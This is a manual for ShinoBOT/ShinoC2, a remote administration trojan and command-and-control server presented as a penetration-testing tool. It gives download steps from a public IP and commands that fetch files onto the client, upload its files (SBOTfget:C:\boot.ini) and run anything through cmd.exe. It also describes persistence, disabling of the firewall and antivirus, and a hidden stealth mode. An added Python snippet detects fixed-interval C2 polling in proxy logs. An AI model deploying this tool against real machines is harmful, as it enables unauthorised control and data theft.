SHINOBOT/SHINOC2 MANUAL




Sh1n0g1
VER: 1.3.2.1

OVERVIEW

ShinoBOT/ShinoC2 are penetration test tools for APT prevention.

PURPOSE
The purpose of ShinoBOT/ShinoC2 is to evaluate your protection against recent cyber attacks, such as APTs.

ShinoBOT
ShinoBOT is a RAT (remote administration tool). It connects to ShinoC2 via HTTP/HTTPS (newer versions use HTTPS).

ShinoC2
ShinoC2 is the C&C (command and control) server. You can create a job and send it to your ShinoBOT-affected devices. It has a web GUI, so you can operate it from your browser.

[Diagram labels: ShinoBOT, Access, ShinoC2, Command]

NOTICE

TRY AT YOUR OWN RISK

If you run ShinoBOT on your devices, be aware that they can then be controlled by anyone on the internet. There is weak password protection to prevent this, but do not overestimate it.

I recommend not trying it on a machine that:
- contains sensitive information
- has permission to access your file server / data server / Active Directory, etc.

I accept no responsibility for any machines affected by ShinoBOT, or for any data leakage or breakage. Again, try at your own risk.

HOW TO USE (1/4)

1. Prepare the target machine.
   - .NET Framework 2.0 or later
   - Internet access
2. Download ShinoBOT on your target PC (http://54.244.189.77/shinoc2/shinobot.exe).
3. Run it.
4. Note the password (you can copy it using the box on the right).

HOW TO USE (2/4)

1. Switch to your own machine (continuing to use the target machine is also OK).
2. Access the ShinoC2 web GUI at http://54.244.189.77/shinoc2/ (Chrome recommended).
3. Click the [HOST] link.
4. Find your target host by host name, IP address, or user name, and click the [Assign a job] link.

HOW TO USE (3/4)

1. Select the job (i.e. the command) you want the target machine to run, e.g. System Info.
2. Enter the password you noted earlier.
3. Press the [Assign] button.

HOW TO USE (4/4)

1. Check the status in the job history section.
   Status: [Generated] -> [Accepted] -> [Done]
2. After the status changes to [Done], you can check the result of the task in the Loot column.

HOW TO CREATE A NEW JOB

1. Click the [JOB] icon.
2. Enter the parameters and click [Add new job].

NOTE
Commands are sent to cmd.exe, except for these special commands:
- SBOTshot takes a screenshot.
- SBOTwget makes the client download the specified file.
  e.g. SBOTwget:https://www.google.co.jp/images/srpr/logo4w.png
- SBOTfget makes the client upload the specified file.
  e.g. SBOTfget:C:\boot.ini
- SBOTrunA runs a process asynchronously; ShinoBOT will not wait for the process to end.
  e.g. SBOTrunA:notepad.exe

Jobs are shared with everyone, so do not enter any confidential data such as credentials.

If you execute a process that does not end on its own and do not use SBOTrunA, ShinoBOT will be stuck until the process ends. For example:
- Processes with a GUI, such as notepad or calc
- Interactive CUI processes, such as telnet or ftp

Q&A

Q. Does ShinoBOT's C&C connection support proxies?
A. Yes, but it does not support authenticating proxies. Specifically, if the user has already passed authentication and no further authentication is required for a new session, it will be able to connect through the authenticating proxy.

Q. How is the password managed?
A. The password is generated when you run ShinoBOT for the first time; it is then saved in the registry and uploaded to ShinoC2 in plain text.
HKCU\Software\VB and VBA Program Settings\ShinoBOT\MachineInfo
When ShinoBOT is executed again, it reads the registry value and uses it as the password.

Q. Does it do anything besides communicating and performing commands?
A. Yes. It behaves like malware: it creates a copy of itself on C:\, writes a Run registry entry, and tries to stop the Windows Firewall and the McAfee and Symantec services. If it has no administrator privileges, it fails.

Q&A

Q. Does ShinoBOT need administrative privileges?
A. It depends on the command (job) you want to run on it.

Q. How is the job sent to the target machine?
A. ShinoBOT polls ShinoC2 every 10 seconds. If there is a new job, it downloads and executes it, then sends the result back to ShinoC2.
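The fixed 10-second polling described above is a useful signal when measuring whether your proxy monitoring notices this kind of C&C traffic. The following Python function is an added example, not part of the original manual or of ShinoBOT/ShinoC2: it flags client/destination pairs whose request gaps cluster around a fixed period. The log format, host names and thresholds are assumptions, and the sample log lines are constructed.

```python
from collections import defaultdict
from datetime import datetime
from statistics import median

# Constructed sample proxy log (not real traffic): "timestamp client dest path"
SAMPLE_LOG = """\
2024-01-01T09:00:00 10.0.0.5 c2.example.test /poll
2024-01-01T09:00:02 10.0.0.9 www.example.test /
2024-01-01T09:00:03 10.0.0.9 www.example.test /style.css
2024-01-01T09:00:10 10.0.0.5 c2.example.test /poll
2024-01-01T09:00:20 10.0.0.5 c2.example.test /poll
2024-01-01T09:00:31 10.0.0.5 c2.example.test /poll
2024-01-01T09:00:40 10.0.0.5 c2.example.test /poll
2024-01-01T09:00:45 10.0.0.9 www.example.test /news
this line is malformed and must be skipped
2024-01-01T09:00:50 10.0.0.5 c2.example.test /poll
2024-01-01T09:01:00 10.0.0.5 c2.example.test /poll
2024-01-01T09:01:10 10.0.0.5 c2.example.test /poll
2024-01-01T09:02:10 10.0.0.9 www.example.test /a
2024-01-01T09:02:11 10.0.0.9 www.example.test /b
2024-01-01T09:05:00 10.0.0.9 www.example.test /c
"""

def find_pollers(lines, period=10.0, tolerance=1.5, min_requests=6, min_ratio=0.8):
    """Return {(client, dest): median gap in seconds} for pairs that poll near `period`."""
    seen = defaultdict(list)
    for line in lines:
        parts = line.split()
        if len(parts) < 3:
            continue  # too few fields
        try:
            ts = datetime.fromisoformat(parts[0])
        except ValueError:
            continue  # first field is not a timestamp
        seen[(parts[1], parts[2])].append(ts)
    hits = {}
    for key, stamps in seen.items():
        if len(stamps) < min_requests:
            continue  # too few requests to judge regularity
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        regular = sum(abs(g - period) <= tolerance for g in gaps)
        # Flag only when most gaps sit within `tolerance` of the polling period
        if regular / len(gaps) >= min_ratio:
            hits[key] = median(gaps)
    return hits

if __name__ == "__main__":
    print(find_pollers(SAMPLE_LOG.splitlines()))
```

The tolerance allows for small timing drift; ordinary browsing from 10.0.0.9 has the same request count but irregular gaps, so it is not flagged.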

TIPS

Stealth Mode
Before running ShinoBOT for the first time, rename ShinoBOT.exe to ShinoBOT_nosec.exe. The client GUI will be hidden, and the password will be admin123.

THANK YOU

Thank you for using ShinoBOT/ShinoC2. If you have any (technical) problems, please contact me.
@Sh1n0g1

Special thanks to Tesshy for letting me attack his machine.